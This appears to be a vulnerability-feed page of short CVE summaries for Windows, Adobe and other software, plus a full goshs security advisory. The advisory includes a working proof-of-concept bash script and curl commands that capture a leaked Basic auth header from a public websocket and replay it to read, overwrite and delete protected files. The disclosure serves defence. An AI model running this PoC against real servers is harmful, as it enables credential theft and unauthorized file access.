Local privilege escalation in Windows Storage Spaces Controller (Windows 11 22H2-26H1, Server 2022-2025) enables low-privileged authenticated users to gain SYSTEM-level access via out-of-bounds read exploitation. CVSS 7.8 (High). No public exploit identified at time of analysis, but ENISA EUVD tracking indicates European regulatory attention. Vendor-released patches available for all affected versions.
Local privilege escalation via double free vulnerability in Windows Projected File System (ProjFS) enables low-privileged authenticated users to achieve SYSTEM-level access across Windows 10, Windows 11, and Windows Server environments. The CWE-415 memory corruption flaw requires low attack complexity and no user interaction, affecting all actively supported Windows versions from legacy 1809 builds through current 26H1 releases. Vendor-released patches are available with build numbers confirmed
Privilege escalation in Windows Projected File System (ProjFS) enables low-privileged local users to gain SYSTEM-level control through a double-free memory corruption vulnerability across Windows 10, 11, and Server 2019-2025. Vendor-released patch available for all affected versions (build numbers 10.0.17763.8644+, 10.0.19044.7184+, 10.0.22631.6936+, 10.0.26100.32690+, and newer). No public exploit identified at time of analysis, though the local attack vector with low complexity (CVSS AV:L/AC:L
Desktop Window Manager (DWM) use-after-free memory corruption allows authenticated local attackers to escalate privileges to SYSTEM on all supported Windows 10, Windows 11, and Windows Server versions (2012-2025). The vulnerability enables low-privileged users to gain complete control over affected systems with low attack complexity and no user interaction required. Vendor-released patches are available across all affected versions. No public exploit identified at time of analysis, though the st
Local privilege escalation in Windows Universal Plug and Play Device Host service affects all supported Windows 10, Windows 11, and Windows Server versions via untrusted pointer dereference (CWE-822). Low-complexity attack requires low-level authenticated access (PR:L) with no user interaction, enabling complete system compromise (C:H/I:H/A:H). Microsoft released patches in May 2025 for 21 affected product versions. No public exploit identified at time of analysis, though the local attack vector
Windows Universal Plug and Play (UPnP) Device Host privilege escalation allows authenticated local attackers to gain SYSTEM-level access via use-after-free memory corruption. Affects all supported Windows versions from Server 2012 through Windows 11 26H1 and Windows Server 2025. Vendor-released patches available. Attack requires low complexity with no user interaction (CVSS:3.1 AV:L/AC:L/PR:L/UI:N). No public exploit identified at time of analysis, though the primitive nature of use-after-free v
Local privilege escalation in Windows Container Isolation FS Filter Driver affects all supported Windows 10, Windows 11, and Windows Server versions through use-after-free memory corruption. Low-complexity attack requires only low-privileged local access to achieve full system compromise (SYSTEM-level privileges). Microsoft has released patches for all affected versions. No public exploit identified at time of analysis, but the low attack complexity (AC:L) and requirement for only low privileges
Local privilege escalation in Windows Win32K ICOMP component via untrusted pointer dereference allows low-privileged authenticated users to achieve SYSTEM-level access on Windows 11 (24H2, 25H2, 26H1) and Windows Server 2025. The vulnerability requires local access and low-privilege credentials (PR:L) but no user interaction, with confirmed patch availability from Microsoft. CVSS 7.8 reflects complete compromise of confidentiality, integrity, and availability. No public exploit identified at tim
Local privilege escalation in Microsoft Desktop Window Manager (dwm.exe) affects all supported Windows 10, Windows 11, and Windows Server versions via a use-after-free memory corruption flaw. Authenticated local attackers with low privileges can exploit this CWE-416 weakness to gain SYSTEM-level access with low attack complexity, requiring no user interaction. No public exploit identified at time of analysis, and SSVC framework assesses exploitation status as 'none' with non-automatable attack r
Desktop Window Manager (DWM) use-after-free vulnerability enables local privilege escalation to SYSTEM on Windows 11 and Server 2022/2025. Low-complexity attack requires only low-privileged authenticated access with no user interaction, affecting all current Windows 11 versions (22H2 through 26H1) and Server editions. Vendor-released patches available as of May 2026. CVSS 7.8 (High) reflects significant local privilege escalation risk; no public exploit identified at time of analysis, though the
Desktop Window Manager (DWM) in Windows 10 21H2/22H2, Windows 11 22H3/23H2, and Windows Server 2022 allows authenticated local attackers with low privileges to elevate to SYSTEM via a use-after-free memory corruption flaw. CVSS 7.8 (High). Vendor-released patch available. No public exploit identified at time of analysis, though EPSS data not provided. This is a post-authentication escalation requiring initial local foothold, not a remote intrusion vector.
Local privilege escalation in Windows Universal Plug and Play (UPnP) Device Host affects all supported Windows versions from Server 2012 through Windows 11 26H1 and Server 2025. Authenticated local attackers with low privileges can exploit an untrusted pointer dereference (CWE-822) to achieve complete system compromise with high impact to confidentiality, integrity, and availability. Microsoft has released patches for all affected versions. No public exploit identified at time of analysis, thoug
Local privilege escalation via use-after-free memory corruption in Windows Universal Plug and Play (UPnP) Device Host affects all supported Windows versions from Server 2012 through Windows 11 26H1. Authenticated local attackers with low privileges can exploit this CWE-416 flaw to gain SYSTEM-level access with low attack complexity (CVSS:3.1 AV:L/AC:L/PR:L). Vendor-released patches are available across all affected Windows 10, Windows 11, and Windows Server product lines. No public exploit code
Use-after-free in Microsoft Windows Speech component enables local privilege escalation to SYSTEM on Windows 10 (versions 1809, 21H2, 22H2) and Windows 11 (versions 22H3 through 26H1). Authenticated local attackers with low privileges can exploit memory corruption to gain full system control with low attack complexity and no user interaction required. CVSS 7.8 (High). Vendor-released patches available for all affected versions. No public exploit identified at time of analysis, though the straigh
Local privilege escalation in Windows Speech Brokered API allows authenticated users with low privileges to gain SYSTEM-level access via race condition exploitation. Affects all supported Windows 10, Windows 11, and Windows Server versions (2016-2025). Microsoft released patches in May 2025 across 17 product variants. Despite CVSS 7.8 severity, EPSS score is low (0.04%, 12th percentile) indicating minimal observed exploitation activity. No active exploitation confirmed (not in CISA KEV) and no public exploit code identified at time of analysis.
Local privilege escalation in Windows Speech Brokered API allows authenticated users to gain SYSTEM-level access via use-after-free memory corruption. All supported Windows 10, Windows 11, and Windows Server versions (2016-2025) are affected. Microsoft released patches in their April 2026 security update cycle. EPSS score of 0.04% (12th percentile) indicates low exploitation likelihood in the wild, and no active exploitation or public exploit code has been identified at time of analysis.
Privilege escalation in Windows Projected File System across Windows 10, 11, and Server versions allows authenticated local users to gain SYSTEM-level privileges by exploiting a race condition during concurrent file system operations. Affects all currently supported Windows versions from Server 2019 through Windows 11 26H1. Microsoft released patches in their latest security update cycle. No public exploit identified at time of analysis, though the low attack complexity (AC:L) and minimal privil
Windows Shell privilege escalation affects Windows 10 (1809+), Windows 11 (all versions through 26H1), and Windows Server 2019-2025 via a race condition vulnerability (CWE-362). Local authenticated attackers with low-privilege access can exploit concurrent execution flaws to gain SYSTEM-level privileges with low attack complexity and no user interaction required (CVSS 7.8). Vendor-released patches are available for all affected versions. No public exploit identified at time of analysis, though t
Local privilege escalation in Windows User Interface Core across Windows 10, 11, and Server 2016-2025 allows low-privileged authenticated users to gain elevated system access via a race condition vulnerability. Attack complexity is high (AC:H), requiring precise timing exploitation of shared resource synchronization flaws. Vendor-released patches are available for all affected versions. No public exploit identified at time of analysis, though the local attack vector and authenticated requirement
Privilege escalation in Windows User Interface Core across Windows 10 (1809-22H2), Windows 11 (22H3-26H1), and Windows Server (2019-2025) allows authenticated local attackers to gain elevated privileges via race condition exploitation. Vendor-released patches available for all affected versions. No public exploit identified at time of analysis. CVSS 7.8 (high) with local attack vector and high complexity (CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C) indicates significant real-world risk in multi-user environments where low-privilege users can access affected systems.
Race condition in Windows User Interface Core (MSRC patch CVE-2026-27911) enables low-privileged authenticated attackers to elevate privileges to SYSTEM level on Windows 10, Windows 11, and Windows Server 2016-2025 systems. The flaw stems from improper synchronization when multiple threads concurrently access shared resources in the UI subsystem, creating a time-of-check-time-of-use (TOCTOU) window exploitable for privilege escalation. Patch available per vendor advisory. No public exploit ident
Local privilege escalation in Windows User Interface Core across Windows 10, 11, and Server 2019-2025 allows low-privileged authenticated attackers to achieve SYSTEM-level access via use-after-free memory corruption. The vulnerability requires high attack complexity and local access but enables container escape (scope change) with full confidentiality, integrity, and availability impact. Vendor-released patches are available for all affected versions. No public exploit identified at time of analysis, though the use-after-free primitive is a well-understood exploitation technique.
Arbitrary code execution in Adobe FrameMaker 2022.8 and earlier allows local attackers to execute malicious code with current user privileges by tricking victims into opening specially crafted files. This use-after-free memory corruption vulnerability requires no authentication but depends on user interaction. No confirmed active exploitation (not in CISA KEV) or public proof-of-concept identified at time of analysis, though the local attack vector and user interaction requirement reduce immediate remote threat surface compared to network-accessible vulnerabilities.
Arbitrary code execution in Adobe InDesign Desktop versions 20.5.2, 21.2 and earlier allows unauthenticated attackers to execute malicious code with current user privileges through maliciously crafted files. The use-after-free vulnerability requires user interaction (opening a weaponized InDesign file) but offers high impact across confidentiality, integrity, and availability. EPSS data not provided; no public exploit identified at time of analysis. Exploitation likelihood increased by low attack complexity (CVSS AC:L) requiring only basic social engineering to deliver malicious files.
Arbitrary code execution in Adobe FrameMaker 2022.8 and earlier allows local attackers to execute code with current user privileges via maliciously crafted files. The type confusion vulnerability (CWE-843) requires user interaction to open a weaponized document. CVSS 7.8 (High) reflects significant impact (full confidentiality, integrity, availability compromise) once exploitation succeeds. No public exploit identified at time of analysis, though the local attack vector and user interaction requirement reduce immediate remote exploitation risk.
Arbitrary code execution in Adobe FrameMaker 2022.8 and earlier allows local attackers to execute code in user context by delivering malicious FrameMaker documents that trigger integer underflow during file parsing. Attack requires social engineering to convince targets to open crafted files. No public exploit identified at time of analysis, though CVSS 7.8 severity reflects high impact across confidentiality, integrity, and availability if successfully exploited.
Arbitrary code execution in Adobe FrameMaker 2022.8 and earlier allows local attackers to execute malicious code with current user privileges through specially crafted files exploiting an integer underflow. Attack requires user interaction (opening a malicious file). CVSS 7.8 (High) reflects local attack vector with low complexity. No public exploit identified at time of analysis, and EPSS data not provided. Vendor advisory available at Adobe PSIRT (APSB26-36).
Out-of-bounds write in Adobe FrameMaker 2022.8 and earlier enables arbitrary code execution when users open specially crafted malicious files. The vulnerability achieves full confidentiality, integrity, and availability impact (CVSS 7.8 HIGH) but requires local access and user interaction, limiting immediate risk. No public exploit identified at time of analysis, and exploitation requires social engineering to deliver the malicious file to victims.
Out-of-bounds read in Adobe FrameMaker 2022.8 and earlier enables arbitrary code execution when users open malicious crafted files. Exploitation requires local access and user interaction (CVSS 7.8, AV:L/UI:R), allowing attackers to execute code with current user privileges and achieve high confidentiality, integrity, and availability impact. EPSS data not available; no confirmed active exploitation (CISA KEV) or public exploit code identified at time of analysis. Adobe has released security bulletin APSB26-36 addressing this vulnerability.
Heap-based buffer overflow in Adobe FrameMaker 2022.8 and earlier enables arbitrary code execution with high integrity and confidentiality impact when users open specially crafted malicious files. Attack requires local access and user interaction (CVSS 7.8, AV:L/UI:R), limiting remote exploitation scenarios. No public exploit identified at time of analysis. EPSS data not available, and vulnerability not listed in CISA KEV, suggesting exploitation remains theoretical despite the high CVSS score.
Arbitrary code execution in Adobe InCopy 20.5.2, 21.2 and earlier allows unauthenticated local attackers to execute malicious code with the victim's privileges through a specially crafted file. The vulnerability stems from an out-of-bounds write (CWE-787) triggering memory corruption. Exploitation requires the victim to open a malicious document, making this a viable social engineering vector. No public exploit identified at time of analysis, though the vulnerability's local attack vector and user interaction requirement moderately constrain immediate risk.
Heap-based buffer overflow in Adobe Bridge 16.0.2, 15.1.4, and earlier versions enables arbitrary code execution with victim's privileges when processing maliciously crafted files. Attack requires local access and user interaction (opening a weaponized file). CVSS 7.8 (High) reflects significant impact but local-only attack vector. No public exploit identified at time of analysis, and exploitation probability remains moderate given the user interaction requirement and local access constraint.
Arbitrary code execution in Adobe Illustrator 30.2, 29.8.5 and earlier versions allows unauthenticated local attackers to execute malicious code with current user privileges via crafted file exploitation. The vulnerability requires user interaction (opening a malicious file) but has low attack complexity once delivered. No public exploit identified at time of analysis, with EPSS data unavailable for risk quantification. The out-of-bounds write flaw affects memory management during file parsing operations.
Arbitrary code execution in Adobe Bridge 16.0.2, 15.1.4 and earlier allows local attackers to execute malicious code with current user privileges through specially crafted files. CVSS 7.8 (High) with EPSS data not available. No public exploit identified at time of analysis. Exploitation requires victim to open a malicious Bridge file, making this a realistic threat for targeted attacks using phishing or social engineering delivery methods.
Out-of-bounds read in Adobe Photoshop Desktop 27.4 and earlier enables arbitrary code execution when users open malicious files. Attackers can read beyond allocated memory boundaries during file parsing to execute code with current user privileges. CVSS 7.8 (High) reflects local attack vector requiring user interaction. No public exploit identified at time of analysis, though exploitation requires only low complexity once a victim opens the crafted file.
Heap-based buffer overflow in Adobe InDesign Desktop versions 20.5.2, 21.2 and earlier enables arbitrary code execution with high impact to confidentiality, integrity, and availability when users open malicious files. The vulnerability requires local access and user interaction (opening a crafted document), with no authentication barriers (CVSS PR:N). No public exploit identified at time of analysis, and CISA SSVC framework rates this as non-exploited with total technical impact but not automatable, indicating targeted attack potential rather than mass exploitation risk.
Heap-based buffer overflow in Adobe InDesign Desktop versions 20.5.2, 21.2 and earlier enables arbitrary code execution with high integrity and confidentiality impact when users open specially crafted malicious files. No public exploit identified at time of analysis. CVSS 7.8 reflects local attack vector requiring user interaction but no authentication, with complete system compromise potential in user context. EPSS risk data not available; exploitation requires social engineering to deliver malicious InDesign document.
Heap-based buffer overflow in Adobe InDesign Desktop versions 20.5.2, 21.2 and earlier enables arbitrary code execution with high confidentiality, integrity, and availability impact when users open malicious files. No public exploit identified at time of analysis. Attack requires local access and user interaction (opening a crafted file), with low attack complexity and no authentication requirements (CVSS:3.1 AV:L/AC:L/PR:N/UI:R). EPSS risk data not available; vulnerability enables complete system compromise in user context.
Out-of-bounds read in Adobe InDesign Desktop versions 20.5.2, 21.2, and earlier enables arbitrary code execution when users open malicious files. Attack requires local access and user interaction (CVSS AV:L/UI:R) but no authentication (PR:N), allowing attackers with file delivery capability to execute code as the victim user. No public exploit identified at time of analysis, though the vulnerability class (CWE-125 out-of-bounds read) is well-understood and commonly weaponized in document processors.
Heap-based buffer overflow in Adobe InDesign Desktop 20.5.2, 21.2 and earlier enables arbitrary code execution with high confidentiality, integrity, and availability impact. Attack requires local access and user interaction (victim opens malicious InDesign file), with low attack complexity and no authentication barriers. CVSS 7.8 reflects significant impact once social engineering succeeds. No CISA KEV listing indicates no confirmed active exploitation at time of analysis. Adobe has published security advisory APSB26-32 addressing this vulnerability.
Arbitrary code execution in Adobe InDesign Desktop versions through 21.2 allows unauthenticated attackers to execute malicious code with full user privileges by exploiting an out-of-bounds write vulnerability via a specially crafted InDesign file. Attack requires local access and user interaction to open the malicious document. No public exploit identified at time of analysis, though CVSS 7.8 reflects high impact if successfully exploited. Adobe has released security bulletin APSB26-32 addressing this memory corruption flaw.
Use-after-free in libsixel's gdk-pixbuf2 loader enables local attackers to achieve code execution via crafted images. Affects libsixel versions through 1.8.7 when compiled with --with-gdk-pixbuf2 option. The vulnerability stems from inconsistent memory management in load_with_gdkpixbuf(), which manually frees reference-counted frame objects, leaving dangling pointers that callbacks can access post-cleanup. CVSS 7.8 (High) with local attack vector requiring user interaction. Fixed in version 1.8.7-r1. No confirmed active exploitation (CISA KEV), though proof-of-concept feasibility is high given the deterministic nature of the memory corruption.
Out-of-bounds read in Adobe InCopy 20.5.2, 21.2 and earlier allows arbitrary code execution when users open malicious files. CVSS 7.8 (High) reflects local attack vector requiring user interaction to open a weaponized document, which then triggers memory disclosure leading to code execution in user context. No public exploit identified at time of analysis. EPSS data not available, but the local-only attack vector and mandatory user interaction substantially reduce real-world risk compared to remotely exploitable flaws.
Command injection in Composer's Perforce integration allows arbitrary code execution when processing malicious composer.json files. Attackers controlling VCS repository configuration can inject shell commands via unsanitized Perforce connection parameters (port, user, client), which execute even without Perforce installed. CVSS 7.8 (High) with local attack vector requiring user interaction. Affects Composer versions before 2.2.27 and 2.9.6. Exploitation requires victim to run Composer commands on attacker-controlled project root composer.json, limiting scope to supply chain or social engineering scenarios. No KEV listing or public POC identified at time of analysis, but exploitation barrier is low once malicious config is introduced.
Heap-based buffer overflow in Adobe Bridge 16.0.2, 15.1.4, and earlier allows arbitrary code execution with user privileges when processing malicious files. CVSS 7.8 (High) reflects the local attack vector requiring victim interaction to open a crafted file. No public exploit identified at time of analysis, with SSVC framework rating this as non-automatable but capable of total technical impact. Exploitation requires social engineering to deliver the malicious file to the target user.
Heap-based buffer overflow in Adobe Bridge 16.0.2, 15.1.4, and earlier versions enables arbitrary code execution with user privileges when processing maliciously crafted files. CVSS 7.8 reflects high impact across confidentiality, integrity, and availability, requiring local access and user interaction. CISA SSVC framework categorizes this as non-automatable with total technical impact. No public exploit identified at time of analysis, and vendor has released security advisory APSB26-39 addressing the vulnerability.
Arbitrary code execution via heap-based buffer overflow in Adobe Bridge (versions 16.0.2, 15.1.4 and earlier) allows local attackers to execute code in the user's security context by tricking victims into opening specially crafted malicious files. No public exploit identified at time of analysis, with SSVC assessment indicating no current exploitation, non-automatable attack requiring user interaction, and total technical impact upon successful compromise.
### Summary goshs leaks file-based ACL credentials through its public collaborator feed when the server is deployed without global basic auth. Requests to `.goshs`-protected folders are logged before authorization is enforced, and the collaborator websocket broadcasts raw request headers, including `Authorization`. An unauthenticated observer can capture a victim's folder-specific basic-auth header and replay it to read, upload, overwrite, and delete files inside the protected subtree. I reproduced this on `v2.0.0-beta.5`, the latest supported release as of April 10, 2026. ### Details The main web UI and collaborator websocket stay public when goshs is started without global `-b user:pass` authentication: - `httpserver/server.go:72-85` only installs `BasicAuthMiddleware()` when a global username or password is configured The vulnerable request is logged before `.goshs` authorization is enforced: - `httpserver/handler.go:277-279` calls `emitCollabEvent()` and `logger.LogRequest()` before the protected file is passed into ACL enforcement - `httpserver/handler.go:291-309` performs folder-level `.goshs` authentication later in `applyCustomAuth()` The collaborator pipeline copies and broadcasts every request header: - `httpserver/collaborator.go:22-46` flattens all request headers, including `Authorization`, into the websocket event and sends them to the hub - `ws/hub.go:77-84` fans the event out live to all connected websocket clients - `ws/hub.go:116-122` replays up to 200 prior HTTP events to newly connected websocket clients via catchup The frontend also makes the leak easier to understand by decoding authorization values: - `assets/js/main.js:627-645` formats and decodes the `Authorization` header for display in the collaborator panel In practice, a victim request such as: ```http GET /ACLAuth/secret.txt Authorization: Basic YWRtaW46YWRtaW4= ``` is visible to any public websocket observer before the protected file's ACL check is enforced. The attacker can then replay the leaked header against the same protected folder and gain the victim's effective access. ### PoC Manual verification commands used: `Terminal 1` ```bash cd '/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5' go build -o /tmp/goshs_beta5 ./ rm -rf /tmp/goshs_collab_root mkdir -p /tmp/goshs_collab_root/ACLAuth cp integration/keepFiles/goshsACLAuth /tmp/goshs_collab_root/ACLAuth/.goshs printf 'very secret\n' > /tmp/goshs_collab_root/ACLAuth/secret.txt /tmp/goshs_beta5 -d /tmp/goshs_collab_root -p 18096 ``` `Terminal 2` ```bash node - <<'NODE' const ws = new WebSocket('ws://127.0.0.1:18096/?ws'); ws.onmessage = (ev) => console.log(ev.data.toString()); NODE ``` `Terminal 3` ```bash curl -s -o /dev/null -w '%{http_code}\n' http://127.0.0.1:18096/ACLAuth/secret.txt curl -s -u admin:admin http://127.0.0.1:18096/ACLAuth/secret.txt curl -s -H 'Authorization: Basic YWRtaW46YWRtaW4=' http://127.0.0.1:18096/ACLAuth/secret.txt curl -s -o /dev/null -w '%{http_code}\n' -H 'Authorization: Basic YWRtaW46YWRtaW4=' -X PUT --data-binary 'owned' http://127.0.0.1:18096/ACLAuth/pwn.txt curl -s -o /dev/null -w '%{http_code}\n' -H 'Authorization: Basic YWRtaW46YWRtaW4=' 'http://127.0.0.1:18096/ACLAuth/secret.txt?delete' ``` Two terminal commands I ran during local validation: ```bash curl -s -o /dev/null -w '%{http_code}\n' http://127.0.0.1:18096/ACLAuth/secret.txt curl -s -H 'Authorization: Basic YWRtaW46YWRtaW4=' http://127.0.0.1:18096/ACLAuth/secret.txt ``` Observed results from manual verification: - the anonymous request returned `401` - the victim request returned `very secret` - the replayed leaked header also returned `very secret` - the replayed `PUT` returned `200` - the replayed `?delete` returned `200` - the public websocket showed `Authorization":"Basic YWRtaW46YWRtaW4="` PoC Video 1: https://github.com/user-attachments/assets/1347838e-28a0-4c9f-be9f-db7e2938c752 Single-script verification: ```bash '/Users/r1zzg0d/Documents/CVE hunting/output/poc/gosh_poc4' ``` Observed script result: - `Captured header: Basic YWRtaW46YWRtaW4=` - `Anonymous GET status: 401` - `Replayed-header GET body: very secret` - `Replayed-header PUT status: 200` - `Replayed-header delete status: 200` - `[RESULT] VULNERABLE: public collaborator feed leaked ACL credentials that unlocked the protected subtree` PoC Video 2: https://github.com/user-attachments/assets/b25648a9-b96c-46b3-9ee4-0ae4cc1c3472 `gosh_poc4` script content: ```bash #!/usr/bin/env bash set -euo pipefail REPO='/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5' FIXTURE='/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5/integration/keepFiles/goshsACLAuth' BIN='/tmp/goshs_beta5_collab_leak' PORT='18096' WORKDIR="$(mktemp -d /tmp/goshs-collab-beta5-XXXXXX)" ROOT="$WORKDIR/root" WS_LOG="$WORKDIR/ws.log" GOSHS_PID="" WATCH_PID="" cleanup() { if [[ -n "${WATCH_PID:-}" ]]; then kill "${WATCH_PID}" >/dev/null 2>&1 || true wait "${WATCH_PID}" 2>/dev/null || true fi if [[ -n "${GOSHS_PID:-}" ]]; then kill "${GOSHS_PID}" >/dev/null 2>&1 || true wait "${GOSHS_PID}" 2>/dev/null || true fi } trap cleanup EXIT mkdir -p "${ROOT}/ACLAuth" cp "${FIXTURE}" "${ROOT}/ACLAuth/.goshs" printf 'very secret\n' > "${ROOT}/ACLAuth/secret.txt" echo "[1/6] Building goshs beta.5" (cd "${REPO}" && go build -o "${BIN}" ./) echo "[2/6] Starting goshs without global auth on 127.0.0.1:${PORT}" "${BIN}" -d "${ROOT}" -p "${PORT}" >"${WORKDIR}/goshs.log" 2>&1 & GOSHS_PID=$! for _ in $(seq 1 40); do if curl -s "http://127.0.0.1:${PORT}/" >/dev/null 2>&1; then break fi sleep 0.25 done echo "[3/6] Opening an unauthenticated websocket observer" node - <<'NODE' >"${WS_LOG}" & const ws = new WebSocket('ws://127.0.0.1:18096/?ws'); ws.onopen = () => console.log('OPEN'); ws.onmessage = (ev) => { const msg = ev.data.toString(); console.log(msg); if (msg.includes('Authorization')) process.exit(0); }; setTimeout(() => process.exit(0), 10000); NODE WATCH_PID=$! echo "[4/6] Simulating a victim request with folder credentials" curl -s -u admin:admin "http://127.0.0.1:${PORT}/ACLAuth/secret.txt" >/dev/null wait "${WATCH_PID}" || true WATCH_PID="" LEAKED_HEADER="$(python3 - "${WS_LOG}" <<'PY' import pathlib import re import sys text = pathlib.Path(sys.argv[1]).read_text() m = re.search(r'Basic [A-Za-z0-9+/=]+', text) print(m.group(0) if m else '') PY )" if [[ -z "${LEAKED_HEADER}" ]]; then echo "[ERROR] No leaked Authorization header was captured." >&2 echo "[DEBUG] Websocket output:" >&2 cat "${WS_LOG}" >&2 exit 1 fi echo "[5/6] Replaying the leaked header as the attacker" UNAUTH_CODE="$(curl -s -o /dev/null -w '%{http_code}' "http://127.0.0.1:${PORT}/ACLAuth/secret.txt")" READ_BACK="$(curl -s -H "Authorization: ${LEAKED_HEADER}" "http://127.0.0.1:${PORT}/ACLAuth/secret.txt")" PUT_CODE="$(curl -s -o /dev/null -w '%{http_code}' -H "Authorization: ${LEAKED_HEADER}" -X PUT --data-binary 'owned' "http://127.0.0.1:${PORT}/ACLAuth/pwn.txt")" DELETE_CODE="$(curl -s -o /dev/null -w '%{http_code}' -H "Authorization: ${LEAKED_HEADER}" "http://127.0.0.1:${PORT}/ACLAuth/secret.txt?delete")" if [[ "${UNAUTH_CODE}" != "401" ]]; then echo "[ERROR] Expected anonymous direct access to fail with 401, got ${UNAUTH_CODE}." >&2 exit 1 fi if [[ "${READ_BACK}" != "very secret" ]]; then echo "[ERROR] Replayed header did not unlock the protected file." >&2 exit 1 fi if [[ "${PUT_CODE}" != "200" ]]; then echo "[ERROR] Expected replayed-header PUT to return 200, got ${PUT_CODE}." >&2 exit 1 fi if [[ "${DELETE_CODE}" != "200" ]]; then echo "[ERROR] Expected replayed-header delete to return 200, got ${DELETE_CODE}." >&2 exit 1 fi if [[ ! -f "${ROOT}/ACLAuth/pwn.txt" ]]; then echo "[ERROR] PUT did not create pwn.txt." >&2 exit 1 fi if [[ -f "${ROOT}/ACLAuth/secret.txt" ]]; then echo "[ERROR] Delete did not remove secret.txt." >&2 exit 1 fi echo "[6/6] Results" echo "Captured header: ${LEAKED_HEADER}" echo "Anonymous GET status: ${UNAUTH_CODE}" echo "Replayed-header GET body: ${READ_BACK}" echo "Replayed-header PUT status: ${PUT_CODE}" echo "Replayed-header delete status: ${DELETE_CODE}" echo "[RESULT] VULNERABLE: public collaborator feed leaked ACL credentials that unlocked the protected subtree" ``` ### Impact This issue is a sensitive information disclosure that becomes an authentication bypass against `.goshs`-protected content. Any unauthenticated observer who can access the public collaborator websocket can steal folder-level basic-auth credentials from a victim request and immediately reuse them to read, upload, overwrite, or delete files inside the protected subtree. Deployments that rely on public goshs access with selective `.goshs`-protected subfolders are directly exposed. ### Remediation Suggested fixes: 1. Never store or broadcast sensitive headers such as `Authorization`, `Cookie`, or `Proxy-Authorization` in collaborator events. 2. Move collaborator logging until after access-control checks, and log only minimal metadata instead of raw headers and bodies. 3. Protect the collaborator websocket and panel with the same or stronger authentication boundary as the resources being observed.
BitLocker encryption bypass in Windows Server 2012 through 2022 enables local attackers with physical access to circumvent disk encryption protections without authentication. The vulnerability affects all Server Core and standard editions across ten years of Windows Server releases. Patch available per Microsoft Security Response Center (MSRC-2026-27913). No public exploit identified at time of analysis, but the local attack vector (AV:L) with no authentication requirement (PR:N) indicates high risk in scenarios where physical device access is possible, such as lost/stolen servers or insider threats.
Path traversal in Adobe ColdFusion 2023.18, 2025.6 and earlier allows authenticated remote attackers to bypass security controls and cause high availability impact through unauthorized file system access. CVSS 7.7 (High) reflects network-accessible attack vector with low complexity requiring only low-privilege authentication and scope change indicating impact beyond vulnerable component. No active exploitation (CISA KEV) or public POC identified at time of analysis, but zero-interaction exploitation pathway and vendor security advisory publication (APSB26-38) indicate concrete threat requiring prompt remediation.